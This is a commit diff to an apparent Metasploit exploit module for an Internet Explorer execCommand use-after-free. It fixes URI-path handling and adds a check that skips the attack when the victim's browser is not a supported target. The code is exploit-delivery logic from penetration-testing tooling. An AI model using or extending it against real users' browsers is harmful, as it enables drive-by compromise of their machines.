Fix URIPATH and nil target

Allow random and '/' as URIPATh, also refuse serving the exploit
when the browser is unknown.

Author: sinn3r

modules/exploits/windows/browser/ie_execcommand_uaf.rb

@@ -285,7 +285,7 @@ def load_html1(cli, my_target)
 					arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";
 				</script>
 
-				<iframe src="#{get_resource}/#{@html2_name}"></iframe>
+				<iframe src="#{this_resource}/#{@html2_name}"></iframe>
 				<script>
 					#{js}
 		        </script>
@@ -321,11 +321,23 @@ def load_html2
 		return html
 	end
 
+	def this_resource
+		r = get_resource
+		return ( r == '/') ? '' : r
+	end
+
 	def on_request_uri(cli, request)
 		print_status request.headers['User-Agent']
 		agent = request.headers['User-Agent']
 		my_target = get_target(agent)
 
+		# Avoid the attack if the victim doesn't have the same setup we're targeting
+		if my_target.nil?
+			print_error("Browser not supported: #{agent.to_s}")
+			send_not_found(cli)
+			return
+		end
+
 		vprint_status("Requesting: #{request.uri}")
 
 		if request.uri =~ /#{@html2_name}/
@@ -334,9 +346,9 @@ def on_request_uri(cli, request)
 		elsif request.uri =~ /#{@html1_name}/
 			print_status("Loading #{@html1_name}")
 			html = load_html1(cli, my_target)
-		elsif request.uri =~ /#{get_resource}$/
+		elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
 			print_status("Redirecting to #{@html1_name}")
-			send_redirect(cli, "#{get_resource}/#{@html1_name}")
+			send_redirect(cli, "#{this_resource}/#{@html1_name}")
 			return
 		else
 			send_not_found(cli)